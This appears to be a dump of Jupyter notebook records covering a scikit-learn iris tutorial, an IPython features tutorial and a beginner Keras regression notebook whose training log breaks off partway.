"## What is Machine Learning?\n\nIn this section we will begin to explore the basic principles of machine learning.\nMachine Learning is about building programs with **tunable parameters** (typically an\narray of floating point values) that are adjusted automatically so as to improve\ntheir behavior by **adapting to previously seen data.**\n\nMachine Learning can be considered a subfield of **Artificial Intelligence** since those\nalgorithms can be seen as building blocks to make computers learn to behave more\nintelligently by somehow **generalizing** rather that just storing and retrieving data items\nlike a database system would do.\n\nWe'll take a look at two very simple machine learning tasks here.\nThe first is a **classification** task: the figure shows a\ncollection of two-dimensional data, colored according to two different class\nlabels. A classification algorithm may be used to draw a dividing boundary\nbetween the two clusters of points:",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\n\nplt.style.use('seaborn')",
"_____no_output_____"
],
[
"# Import the example plot from the figures directory\nfrom fig_code import plot_sgd_separator\nplot_sgd_separator()",
"_____no_output_____"
]
],
[
[
"This may seem like a trivial task, but it is a simple version of a very important concept.\nBy drawing this separating line, we have learned a model which can **generalize** to new\ndata: if you were to drop another point onto the plane which is unlabeled, this algorithm\ncould now **predict** whether it's a blue or a red point.\n\nIf you'd like to see the source code used to generate this, you can either open the\ncode in the `figures` directory, or you can load the code using the `%load` magic command:",
"_____no_output_____"
],
[
"The next simple task we'll look at is a **regression** task: a simple best-fit line\nto a set of data:",
"_____no_output_____"
]
],
[
[
"from fig_code import plot_linear_regression\nplot_linear_regression()",
"_____no_output_____"
]
],
[
[
"Again, this is an example of fitting a model to data, such that the model can make\ngeneralizations about new data. The model has been **learned** from the training\ndata, and can be used to predict the result of test data:\nhere, we might be given an x-value, and the model would\nallow us to predict the y value. Again, this might seem like a trivial problem,\nbut it is a basic example of a type of operation that is fundamental to\nmachine learning tasks.",
"_____no_output_____"
],
[
"## Representation of Data in Scikit-learn\n\nMachine learning is about creating models from data: for that reason, we'll start by\ndiscussing how data can be represented in order to be understood by the computer. Along\nwith this, we'll build on our matplotlib examples from the previous section and show some\nexamples of how to visualize data.",
"_____no_output_____"
],
[
"Most machine learning algorithms implemented in scikit-learn expect data to be stored in a\n**two-dimensional array or matrix**. The arrays can be\neither ``numpy`` arrays, or in some cases ``scipy.sparse`` matrices.\nThe size of the array is expected to be `[n_samples, n_features]`\n\n- **n_samples:** The number of samples: each sample is an item to process (e.g. classify).\n A sample can be a document, a picture, a sound, a video, an astronomical object,\n a row in database or CSV file,\n or whatever you can describe with a fixed set of quantitative traits.\n- **n_features:** The number of features or distinct traits that can be used to describe each\n item in a quantitative manner. Features are generally real-valued, but may be boolean or\n discrete-valued in some cases.\n\nThe number of features must be fixed in advance. However it can be very high dimensional\n(e.g. millions of features) with most of them being zeros for a given sample. This is a case\nwhere `scipy.sparse` matrices can be useful, in that they are\nmuch more memory-efficient than numpy arrays.",
"_____no_output_____"
],
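[
"For instance, a tiny feature matrix might look like this (a sketch, assuming only `numpy`):\n\n```python\nimport numpy as np\n\n# 2 samples (rows) x 4 features (columns)\nX = np.array([[5.1, 3.5, 1.4, 0.2],\n              [4.9, 3.0, 1.4, 0.2]])\nprint(X.shape)  # (2, 4) -> [n_samples, n_features]\n```",
"_____no_output_____"
],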
[
"\n\n(Figure from the [Python Data Science Handbook](https://github.com/jakevdp/PythonDataScienceHandbook))",
"_____no_output_____"
],
[
"## A Simple Example: the Iris Dataset\n\nAs an example of a simple dataset, we're going to take a look at the\niris data stored by scikit-learn.\nThe data consists of measurements of three different species of irises.\nThere are three species of iris in the dataset, which we can picture here:",
"_____no_output_____"
]
],
[
[
"from IPython.core.display import Image, display\ndisplay(Image(filename='images/iris_setosa.jpg'))\nprint(\"Iris Setosa\\n\")\n\ndisplay(Image(filename='images/iris_versicolor.jpg'))\nprint(\"Iris Versicolor\\n\")\n\ndisplay(Image(filename='images/iris_virginica.jpg'))\nprint(\"Iris Virginica\")",
"_____no_output_____"
]
],
[
[
"### Quick Question:\n\n**If we want to design an algorithm to recognize iris species, what might the data be?**\n\nRemember: we need a 2D array of size `[n_samples x n_features]`.\n\n- What would the `n_samples` refer to?\n\n- What might the `n_features` refer to?\n\nRemember that there must be a **fixed** number of features for each sample, and feature\nnumber ``i`` must be a similar kind of quantity for each sample.",
"_____no_output_____"
],
[
"### Loading the Iris Data with Scikit-Learn\n\nScikit-learn has a very straightforward set of data on these iris species. The data consist of\nthe following:\n\n- Features in the Iris dataset:\n\n 1. sepal length in cm\n 2. sepal width in cm\n 3. petal length in cm\n 4. petal width in cm\n\n- Target classes to predict:\n\n 1. Iris Setosa\n 2. Iris Versicolour\n 3. Iris Virginica\n \n``scikit-learn`` embeds a copy of the iris CSV file along with a helper function to load it into numpy arrays:",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import load_iris\niris = load_iris()",
"_____no_output_____"
],
[
"iris.keys()",
"_____no_output_____"
],
[
"n_samples, n_features = iris.data.shape\nprint((n_samples, n_features))\nprint(iris.data[0])",
"(150, 4)\n[5.1 3.5 1.4 0.2]\n"
],
[
"print(iris.data.shape)\nprint(iris.target.shape)",
"(150, 4)\n(150,)\n"
],
[
"print(iris.target)",
"[0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 2\n 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2\n 2 2]\n"
],
[
"print(iris.target_names)",
"['setosa' 'versicolor' 'virginica']\n"
]
],
[
[
"This data is four dimensional, but we can visualize two of the dimensions\nat a time using a simple scatter-plot:",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n\nx_index = 0\ny_index = 2\n\n# this formatter will label the colorbar with the correct target names\nformatter = plt.FuncFormatter(lambda i, *args: iris.target_names[int(i)])\n\nplt.scatter(iris.data[:, x_index], iris.data[:, y_index],\n c=iris.target, cmap=plt.cm.get_cmap('RdYlBu', 3))\nplt.colorbar(ticks=[0, 1, 2], format=formatter)\nplt.clim(-0.5, 2.5)\nplt.xlabel(iris.feature_names[x_index])\nplt.ylabel(iris.feature_names[y_index]);",
"_____no_output_____"
]
],
[
[
"### Quick Exercise:\n\n**Change** `x_index` **and** `y_index` **in the above script\nand find a combination of two parameters\nwhich maximally separate the three classes.**\n\nThis exercise is a preview of **dimensionality reduction**, which we'll see later.",
"_____no_output_____"
],
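[
"(Hint: one pair that is known to separate the three classes well is petal length vs. petal width,\n\n```python\nx_index = 2  # petal length (cm)\ny_index = 3  # petal width (cm)\n```\n\nbut try a few combinations yourself first.)",
"_____no_output_____"
],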
[
"## Other Available Data\nThey come in three flavors:\n\n- **Packaged Data:** these small datasets are packaged with the scikit-learn installation,\n and can be downloaded using the tools in ``sklearn.datasets.load_*``\n- **Downloadable Data:** these larger datasets are available for download, and scikit-learn\n includes tools which streamline this process. These tools can be found in\n ``sklearn.datasets.fetch_*``\n- **Generated Data:** there are several datasets which are generated from models based on a\n random seed. These are available in the ``sklearn.datasets.make_*``\n\nYou can explore the available dataset loaders, fetchers, and generators using IPython's\ntab-completion functionality. After importing the ``datasets`` submodule from ``sklearn``,\ntype\n\n datasets.load_ + TAB\n\nor\n\n datasets.fetch_ + TAB\n\nor\n\n datasets.make_ + TAB\n\nto see a list of available functions.",
"_____no_output_____"
]
],
[
[
"from sklearn import datasets",
"_____no_output_____"
],
[
"# Type datasets.fetch_<TAB> or datasets.load_<TAB> in IPython to see all possibilities\n\n datasets.fetch_california_housing",
"_____no_output_____"
],
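[
"# A concrete example (a sketch; load_digits ships with scikit-learn):\ndigits = datasets.load_digits()\nprint(digits.data.shape)  # (1797, 64): 1797 samples, 64 features",
"_____no_output_____"
],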
[
" datasets.load_",
"_____no_output_____"
]
],
[
[
"In the next section, we'll use some of these datasets and take a look at the basic principles of machine learning.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
e7087077b09e6e93c3c4f421954c39c3ff64e6ac | 60,378 | ipynb | Jupyter Notebook | 3-IPython.ipynb | lheagy/leads-intro-jupyter | 7898d8dd4f11935b9762f7f374cea3fdc850fd28 | [
"MIT"
] | null | null | null | 3-IPython.ipynb | lheagy/leads-intro-jupyter | 7898d8dd4f11935b9762f7f374cea3fdc850fd28 | [
"MIT"
] | null | null | null | 3-IPython.ipynb | lheagy/leads-intro-jupyter | 7898d8dd4f11935b9762f7f374cea3fdc850fd28 | [
"MIT"
] | null | null | null | 38.853282 | 551 | 0.555418 | [
[
[
"# IPython: beyond plain Python\n\nAdapted from the ICESat2 Hackweek [intro-jupyter-git](https://github.com/ICESAT-2HackWeek/intro-jupyter-git) session. Courtesy of [@fperez](https://github.com/fperez).\n\nWhen executing code in IPython, all valid Python syntax works as-is, but IPython provides a number of features designed to make the interactive experience more fluid and efficient.",
"_____no_output_____"
],
[
"## First things first: running code, getting help\n\nIn the notebook, to run a cell of code, hit `Shift-Enter`. This executes the cell and puts the cursor in the next cell below, or makes a new one if you are at the end. Alternately, you can use:\n \n- `Alt-Enter` to force the creation of a new cell unconditionally (useful when inserting new content in the middle of an existing notebook).\n- `Control-Enter` executes the cell and keeps the cursor in the same cell, useful for quick experimentation of snippets that you don't need to keep permanently.",
"_____no_output_____"
]
],
[
[
"print(\"Hi\")",
"Hi\n"
]
],
[
[
"Getting help:",
"_____no_output_____"
]
],
[
[
"?",
"_____no_output_____"
]
],
[
[
"Typing `object_name?` will print all sorts of details about any object, including docstrings, function definition lines (for call arguments) and constructor details for classes.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nnp.linspace?",
"_____no_output_____"
],
[
"np.isclose??",
"_____no_output_____"
],
[
"*int*?",
"_____no_output_____"
]
],
[
[
"An IPython quick reference card:",
"_____no_output_____"
]
],
[
[
"%quickref",
"_____no_output_____"
]
],
[
[
"## Tab completion\n\nTab completion, especially for attributes, is a convenient way to explore the structure of any object you’re dealing with. Simply type `object_name.<TAB>` to view the object’s attributes. Besides Python objects and keywords, tab completion also works on file and directory names.",
"_____no_output_____"
]
],
[
[
"np.",
"_____no_output_____"
]
],
[
[
"## The interactive workflow: input, output, history",
"_____no_output_____"
]
],
[
[
"2+10",
"_____no_output_____"
],
[
"_+10",
"_____no_output_____"
]
],
[
[
"You can suppress the storage and rendering of output if you append `;` to the last cell (this comes in handy when plotting with matplotlib, for example):",
"_____no_output_____"
]
],
[
[
"10+20;",
"_____no_output_____"
],
[
"_",
"_____no_output_____"
]
],
[
[
"The output is stored in `_N` and `Out[N]` variables:",
"_____no_output_____"
]
],
[
[
"_11 == Out[11]",
"_____no_output_____"
]
],
[
[
"Previous inputs are available, too:",
"_____no_output_____"
]
],
[
[
"In[11]",
"_____no_output_____"
],
[
"_i",
"_____no_output_____"
],
[
"%history -n 1-5",
"_____no_output_____"
]
],
[
[
"**Exercise**\n\nUse `%history?` to have a look at `%history`'s magic documentation, and write the last 10 lines of history to a file named `log.py`.",
"_____no_output_____"
],
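[
"One possible solution (a sketch; flag details may vary by IPython version, so check `%history?` yourself):\n\n```python\n%history -l 10 -f log.py  # write the last 10 input lines to the file log.py\n```",
"_____no_output_____"
],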
[
"## Accessing the underlying operating system\n",
"_____no_output_____"
]
],
[
[
"!pwd",
"_____no_output_____"
],
[
"files = !ls \nprint(\"files this directory:\")\nprint(files)",
"_____no_output_____"
],
[
"files",
"_____no_output_____"
],
[
"!echo $files",
"_____no_output_____"
],
[
"!echo {files[0].upper()}",
"_____no_output_____"
]
],
[
[
"Note that all this is available even in multiline blocks:",
"_____no_output_____"
]
],
[
[
"import os\nfor i,f in enumerate(files):\n if f.endswith('ipynb'):\n !echo {\"%02d\" % i} - \"{os.path.splitext(f)[0]}\"\n else:\n print('--')",
"_____no_output_____"
]
],
[
[
"## Beyond Python: magic functions\n\nThe IPyhton 'magic' functions are a set of commands, invoked by prepending one or two `%` signs to their name, that live in a namespace separate from your normal Python variables and provide a more command-like interface. They take flags with `--` and arguments without quotes, parentheses or commas. The motivation behind this system is two-fold:\n \n- To provide an namespace for controlling IPython itself and exposing other system-oriented functionality that is separate from your Python variables and functions. This lets you have a `cd` command accessible as a magic regardless of whether you have a Python `cd` variable.\n\n- To expose a calling mode that requires minimal verbosity and typing while working interactively. Thus the inspiration taken from the classic Unix shell style for commands.",
"_____no_output_____"
]
],
[
[
"%magic",
"_____no_output_____"
]
],
[
[
"Line vs cell magics:\n\nMagics can be applied at the single-line level or to entire cells. Line magics are identified with a single `%` prefix, while cell magics use `%%` and can only be used as the first line of the cell (since they apply to the entire cell). Some magics, like the convenient `%timeit` that ships built-in with IPython, can be called in either mode, while others may be line- or cell-only (you can see all magics with `%lsmagic`).\n\nLet's see this with some `%timeit` examples:",
"_____no_output_____"
]
],
[
[
"%timeit list(range(1000))",
"_____no_output_____"
],
[
"%%timeit\n# comment here\n\nlist(range(10))\nlist(range(100))",
"_____no_output_____"
]
],
[
[
"Line magics can be used even inside code blocks:",
"_____no_output_____"
]
],
[
[
"for i in range(1, 5):\n size = i*100\n print('size:', size, end=' ')\n %timeit list(range(size))",
"_____no_output_____"
]
],
[
[
"Magics can do anything they want with their input, so it doesn't have to be valid Python (note that the below may not work on a Windows machine, depending on how you are running Jupyter on it):",
"_____no_output_____"
]
],
[
[
"%%bash\necho \"My shell is:\" $SHELL\necho \"My disk usage is:\"\ndf -h",
"_____no_output_____"
]
],
[
[
"Another interesting cell magic: create any file you want locally from the notebook:",
"_____no_output_____"
]
],
[
[
"%%writefile test.txt\nThis is a test file!\nIt can contain anything I want...\n\nAnd more...\n\n",
"_____no_output_____"
],
[
"!cat test.txt",
"_____no_output_____"
]
],
[
[
"Let's see what other magics are currently defined in the system:",
"_____no_output_____"
]
],
[
[
"%lsmagic",
"_____no_output_____"
],
[
"def to_optimize(N):\n total = [0,0]\n ta = 0\n tb = 0\n for i in range(N):\n for j in range(N):\n a = i**2\n b = j*2\n total[0] += a\n total[1] += b\n return total",
"_____no_output_____"
],
[
"%timeit to_optimize(1_000)",
"_____no_output_____"
],
[
"%prun to_optimize(1_000)",
"_____no_output_____"
]
],
[
[
"## Running normal Python code: execution and errors\n\nNot only can you input normal Python code, you can even paste straight from a Python or IPython shell session:",
"_____no_output_____"
]
],
[
[
">>> # Fibonacci series:\n... # the sum of two elements defines the next\n... a, b = 0, 1\n>>> while b < 10:\n... print(b)\n... a, b = b, a+b",
"_____no_output_____"
],
[
"In [1]: for i in range(10):\n ...: print(i, end=' ')\n ...: ",
"_____no_output_____"
]
],
[
[
"And when your code produces errors, you can control how they are displayed with the `%xmode` magic:",
"_____no_output_____"
]
],
[
[
"%%writefile mod.py\n\ndef f(x):\n return 1.0/(x-1)\n\ndef g(y):\n return f(y+1)",
"_____no_output_____"
]
],
[
[
"Now let's call the function `g` with an argument that would produce an error:",
"_____no_output_____"
]
],
[
[
"import mod\nmod.g(0)",
"_____no_output_____"
]
],
[
[
"## Basic debugging\n\nWhen running code interactively, it can be tricky to figure out how to debug... ",
"_____no_output_____"
]
],
[
[
"%debug",
"_____no_output_____"
],
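[
"# Related (a sketch): %pdb toggles automatic entry into the debugger on uncaught exceptions\n%pdb 1",
"_____no_output_____"
],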
[
"enjoy = input('Are you enjoying this tutorial? ')\nprint('enjoy is:', enjoy)",
"_____no_output_____"
]
],
[
[
"## Running code in other languages with special `%%` magics",
"_____no_output_____"
]
],
[
[
"%%perl\n@months = (\"July\", \"August\", \"September\");\nprint $months[0];",
"_____no_output_____"
]
],
[
[
"## Plotting in the notebook",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"x = np.linspace(0, 2*np.pi, 300)\ny = np.sin(x**2)\nplt.plot(x, y)\nplt.title(\"A little chirp\")",
"_____no_output_____"
]
],
[
[
"---\n\n## A quick tour of widgets\n\nThis is meant to provide a quick overview of some of the things you can do with Jupyter widgets. For more ideas, you can check out [the docs](https://ipywidgets.readthedocs.io/en/latest/), and the notebooks from the [ICESat2 Hackweek](https://github.com/ICESAT-2HackWeek/intro-jupyter-git)",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport ipywidgets\n\n%matplotlib inline",
"_____no_output_____"
],
[
"def sin_x(x, frequency=1, phase=0):\n return np.sin(\n 2*np.pi*frequency*x + phase\n )",
"_____no_output_____"
],
[
"def plot_sin_x(frequency=1, phase=0, title=\"a\"):\n x = np.linspace(-1, 1, 200)\n plt.plot(x, sin_x(x, frequency, phase))\n plt.title(title)",
"_____no_output_____"
],
[
"plot_sin_x()",
"_____no_output_____"
]
],
[
[
"### using interactive",
"_____no_output_____"
]
],
[
[
"widget = ipywidgets.interactive(plot_sin_x, frequency=1.5, phase=0.)\nwidget",
"_____no_output_____"
]
],
[
[
"### specifying the widgets",
"_____no_output_____"
]
],
[
[
"mywidget = ipywidgets.interactive(\n plot_sin_x,\n frequency = ipywidgets.FloatSlider(min=0, max=10, value=1, display=\"f\"),\n# phase = ipywidgets.FloatSlider(min=-np.pi, max=np.pi, value=0)\n phase = ipywidgets.FloatText(value=0),\n title = ipywidgets.ToggleButtons(options=[\"a\", \"b\"])\n)\nmywidget",
"_____no_output_____"
],
[
"mywidget.children[1].value",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e70874330582c74647ee8eceb12851fdb20d1041 | 63,217 | ipynb | Jupyter Notebook | Intro_to_Tensorflow_for_AIMLDL/week1/Helloworld_of_DL.ipynb | adityabingi/Tensorflow_Sepcialization_Coursera | 826e6011315f091053d57fafcc0ce094e32726f2 | [
"MIT"
] | 1 | 2021-03-31T14:03:04.000Z | 2021-03-31T14:03:04.000Z | Intro_to_Tensorflow_for_AIMLDL/week1/Helloworld_of_DL.ipynb | adityabingi/Tensorflow_Sepcialization_Coursera | 826e6011315f091053d57fafcc0ce094e32726f2 | [
"MIT"
] | null | null | null | Intro_to_Tensorflow_for_AIMLDL/week1/Helloworld_of_DL.ipynb | adityabingi/Tensorflow_Sepcialization_Coursera | 826e6011315f091053d57fafcc0ce094e32726f2 | [
"MIT"
] | null | null | null | 48.405054 | 431 | 0.391256 | [
[
[
"# The Hello World of Deep Learning with Neural Networks",
"_____no_output_____"
],
[
"Like every first app you should start with something super simple that shows the overall scaffolding for how your code works. \n\nIn the case of creating neural networks, the sample I like to use is one where it learns the relationship between two numbers. So, for example, if you were writing code for a function like this, you already know the 'rules' — \n\n\n```\nfloat hw_function(float x){\n float y = (2 * x) - 1;\n return y;\n}\n```\n\nSo how would you train a neural network to do the equivalent task? Using data! By feeding it with a set of Xs, and a set of Ys, it should be able to figure out the relationship between them. \n\nThis is obviously a very different paradigm than what you might be used to, so let's step through it piece by piece.\n",
"_____no_output_____"
],
[
"## Imports\n\nLet's start with our imports. Here we are importing TensorFlow and calling it tf for ease of use.\n\nWe then import a library called numpy, which helps us to represent our data as lists easily and quickly.\n\nThe framework for defining a neural network as a set of Sequential layers is called keras, so we import that too.",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras",
"_____no_output_____"
]
],
[
[
"## Define and Compile the Neural Network\n\nNext we will create the simplest possible neural network. It has 1 layer, and that layer has 1 neuron, and the input shape to it is just 1 value.",
"_____no_output_____"
]
],
[
[
"model = tf.keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])",
"WARNING: Logging before flag parsing goes to stderr.\nW0708 11:08:27.407203 140426386540416 deprecation.py:506] From /usr/local/lib/python3.6/dist-packages/tensorflow/python/ops/init_ops.py:1251: calling VarianceScaling.__init__ (from tensorflow.python.ops.init_ops) with dtype is deprecated and will be removed in a future version.\nInstructions for updating:\nCall initializer instance with the dtype argument instead of passing it to the constructor\n"
]
],
[
[
"Now we compile our Neural Network. When we do so, we have to specify 2 functions, a loss and an optimizer.\n\nIf you've seen lots of math for machine learning, here's where it's usually used, but in this case it's nicely encapsulated in functions for you. But what happens here — let's explain...\n\nWe know that in our function, the relationship between the numbers is y=2x-1. \n\nWhen the computer is trying to 'learn' that, it makes a guess...maybe y=10x+10. The LOSS function measures the guessed answers against the known correct answers and measures how well or how badly it did.\n\nIt then uses the OPTIMIZER function to make another guess. Based on how the loss function went, it will try to minimize the loss. At that point maybe it will come up with somehting like y=5x+5, which, while still pretty bad, is closer to the correct result (i.e. the loss is lower)\n\nIt will repeat this for the number of EPOCHS which you will see shortly. But first, here's how we tell it to use 'MEAN SQUARED ERROR' for the loss and 'STOCHASTIC GRADIENT DESCENT' for the optimizer. You don't need to understand the math for these yet, but you can see that they work! :)\n\nOver time you will learn the different and appropriate loss and optimizer functions for different scenarios. \n",
"_____no_output_____"
]
],
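[
[
"To make \"loss\" concrete, here is mean squared error computed by hand for the bad first guess y=10x+10 (a sketch, assuming only `numpy`; Keras does this for us during training):\n\n```python\nimport numpy as np\n\nxs = np.array([-1.0, 0.0, 1.0])\ny_true = 2 * xs - 1          # the real rule\ny_guess = 10 * xs + 10       # a bad first guess\nmse = np.mean((y_guess - y_true) ** 2)\nprint(mse)  # a big number, so a bad guess\n```",
"_____no_output_____"
]
],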
[
[
"model.compile(optimizer='sgd', loss='mean_squared_error')",
"_____no_output_____"
]
],
[
[
"## Providing the Data\n\nNext up we'll feed in some data. In this case we are taking 6 xs and 6ys. You can see that the relationship between these is that y=2x-1, so where x = -1, y=-3 etc. etc. \n\nA python library called 'Numpy' provides lots of array type data structures that are a defacto standard way of doing it. We declare that we want to use these by specifying the values as an np.array[]",
"_____no_output_____"
]
],
[
[
"xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)\nys = np.array([-3.0, -1.0, 1.0, 3.0, 5.0, 7.0], dtype=float)",
"_____no_output_____"
]
],
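[
[
"As a quick sanity check (a sketch): every y above really does follow y = 2x - 1.\n\n```python\nimport numpy as np\n\nxs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0])\nprint(2 * xs - 1)  # [-3. -1.  1.  3.  5.  7.] -- matches ys\n```",
"_____no_output_____"
]
],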
[
[
"# Training the Neural Network",
"_____no_output_____"
],
[
"The process of training the neural network, where it 'learns' the relationship between the Xs and Ys is in the **model.fit** call. This is where it will go through the loop we spoke about above, making a guess, measuring how good or bad it is (aka the loss), using the opimizer to make another guess etc. It will do it for the number of epochs you specify. When you run this code, you'll see the loss on the right hand side.",
"_____no_output_____"
]
],
[
[
"model.fit(xs, ys, epochs=500)",
"Epoch 1/500\n6/6 [==============================] - 4s 597ms/sample - loss: 7.5053\nEpoch 2/500\n6/6 [==============================] - 0s 1ms/sample - loss: 6.0989\nEpoch 3/500\n6/6 [==============================] - 0s 1ms/sample - loss: 4.9883\nEpoch 4/500\n6/6 [==============================] - 0s 821us/sample - loss: 4.1107\nEpoch 5/500\n6/6 [==============================] - 0s 796us/sample - loss: 3.4164\nEpoch 6/500\n6/6 [==============================] - 0s 833us/sample - loss: 2.8665\nEpoch 7/500\n6/6 [==============================] - 0s 715us/sample - loss: 2.4301\nEpoch 8/500\n6/6 [==============================] - 0s 528us/sample - loss: 2.0832\nEpoch 9/500\n6/6 [==============================] - 0s 357us/sample - loss: 1.8067\nEpoch 10/500\n6/6 [==============================] - 0s 750us/sample - loss: 1.5858\nEpoch 11/500\n6/6 [==============================] - 0s 456us/sample - loss: 1.4086\nEpoch 12/500\n6/6 [==============================] - 0s 353us/sample - loss: 1.2659\nEpoch 13/500\n6/6 [==============================] - 0s 426us/sample - loss: 1.1504\nEpoch 14/500\n6/6 [==============================] - 0s 399us/sample - loss: 1.0563\nEpoch 15/500\n6/6 [==============================] - 0s 408us/sample - loss: 0.9792\nEpoch 16/500\n6/6 [==============================] - 0s 412us/sample - loss: 0.9155\nEpoch 17/500\n6/6 [==============================] - 0s 399us/sample - loss: 0.8624\nEpoch 18/500\n6/6 [==============================] - 0s 655us/sample - loss: 0.8177\nEpoch 19/500\n6/6 [==============================] - 0s 568us/sample - loss: 0.7797\nEpoch 20/500\n6/6 [==============================] - 0s 381us/sample - loss: 0.7469\nEpoch 21/500\n6/6 [==============================] - 0s 654us/sample - loss: 0.7185\nEpoch 22/500\n6/6 [==============================] - 0s 690us/sample - loss: 0.6934\nEpoch 23/500\n6/6 [==============================] - 0s 696us/sample - loss: 0.6710\nEpoch 24/500\n6/6 [==============================] - 0s 391us/sample - loss: 0.6508\nEpoch 25/500\n6/6 [==============================] - 0s 443us/sample - loss: 0.6324\nEpoch 26/500\n6/6 [==============================] - 0s 611us/sample - loss: 0.6154\nEpoch 27/500\n6/6 [==============================] - 0s 470us/sample - loss: 0.5997\nEpoch 28/500\n6/6 [==============================] - 0s 646us/sample - loss: 0.5849\nEpoch 29/500\n6/6 [==============================] - 0s 384us/sample - loss: 0.5710\nEpoch 30/500\n6/6 [==============================] - 0s 285us/sample - loss: 0.5577\nEpoch 31/500\n6/6 [==============================] - 0s 775us/sample - loss: 0.5451\nEpoch 32/500\n6/6 [==============================] - 0s 316us/sample - loss: 0.5329\nEpoch 33/500\n6/6 [==============================] - 0s 374us/sample - loss: 0.5213\nEpoch 34/500\n6/6 [==============================] - 0s 425us/sample - loss: 0.5100\nEpoch 35/500\n6/6 [==============================] - 0s 624us/sample - loss: 0.4990\nEpoch 36/500\n6/6 [==============================] - 0s 509us/sample - loss: 0.4884\nEpoch 37/500\n6/6 [==============================] - 0s 443us/sample - loss: 0.4781\nEpoch 38/500\n6/6 [==============================] - 0s 497us/sample - loss: 0.4681\nEpoch 39/500\n6/6 [==============================] - 0s 606us/sample - loss: 0.4583\nEpoch 40/500\n6/6 [==============================] - 0s 507us/sample - loss: 0.4487\nEpoch 41/500\n6/6 [==============================] - 0s 603us/sample - loss: 0.4394\nEpoch 42/500\n6/6 [==============================] - 0s 446us/sample - loss: 
0.4303\nEpoch 43/500\n6/6 [==============================] - 0s 500us/sample - loss: 0.4214\nEpoch 44/500\n6/6 [==============================] - 0s 567us/sample - loss: 0.4127\nEpoch 45/500\n6/6 [==============================] - 0s 647us/sample - loss: 0.4042\nEpoch 46/500\n6/6 [==============================] - 0s 629us/sample - loss: 0.3958\nEpoch 47/500\n6/6 [==============================] - 0s 480us/sample - loss: 0.3877\nEpoch 48/500\n6/6 [==============================] - 0s 698us/sample - loss: 0.3797\nEpoch 49/500\n6/6 [==============================] - 0s 787us/sample - loss: 0.3719\nEpoch 50/500\n6/6 [==============================] - 0s 860us/sample - loss: 0.3642\nEpoch 51/500\n6/6 [==============================] - 0s 763us/sample - loss: 0.3567\nEpoch 52/500\n6/6 [==============================] - 0s 795us/sample - loss: 0.3494\nEpoch 53/500\n6/6 [==============================] - 0s 559us/sample - loss: 0.3422\nEpoch 54/500\n6/6 [==============================] - 0s 608us/sample - loss: 0.3352\nEpoch 55/500\n6/6 [==============================] - 0s 589us/sample - loss: 0.3283\nEpoch 56/500\n6/6 [==============================] - 0s 653us/sample - loss: 0.3215\nEpoch 57/500\n6/6 [==============================] - 0s 543us/sample - loss: 0.3149\nEpoch 58/500\n6/6 [==============================] - 0s 465us/sample - loss: 0.3085\nEpoch 59/500\n6/6 [==============================] - 0s 353us/sample - loss: 0.3021\nEpoch 60/500\n6/6 [==============================] - 0s 323us/sample - loss: 0.2959\nEpoch 61/500\n6/6 [==============================] - 0s 529us/sample - loss: 0.2898\nEpoch 62/500\n6/6 [==============================] - 0s 407us/sample - loss: 0.2839\nEpoch 63/500\n6/6 